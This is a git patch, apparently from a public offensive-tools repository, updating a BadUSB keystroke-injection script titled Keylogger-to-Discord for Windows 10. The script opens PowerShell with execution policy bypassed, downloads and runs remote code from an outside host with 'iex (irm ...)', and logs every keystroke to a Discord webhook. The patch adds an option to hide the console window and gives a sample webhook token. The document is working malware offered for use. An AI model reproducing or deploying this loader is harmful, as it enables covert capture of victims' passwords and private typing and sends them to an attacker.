From 84a67b970a89a2b605d3f02075462420d3e78173 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 20 Jun 2025 20:44:01 +0000 Subject: [PATCH] Update Keylogger-to-Discord.txt --- Discord-Keylogger/Keylogger-to-Discord.txt | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/Discord-Keylogger/Keylogger-to-Discord.txt b/Discord-Keylogger/Keylogger-to-Discord.txt index 63d3e76..251fa91 100644 --- a/Discord-Keylogger/Keylogger-to-Discord.txt +++ b/Discord-Keylogger/Keylogger-to-Discord.txt @@ -5,16 +5,15 @@ REM Description: This script logs all Keystrokes and posts results to a discord REM Target: Windows 10 REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook Channel and Token ONLY +REM eg. $dc='1206563651960586035/sNqypsq629XmXpc9TP924Dxeox6qMHDCI5e27qJ3fw4ef34wff4wf_df3aFOY' .... +REM To hide the console, use $hide='y' below. -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) +REM open powershell DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dckl) +STRING powershell -Ep Bypass -C $hide='y'; $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dckl) ENTER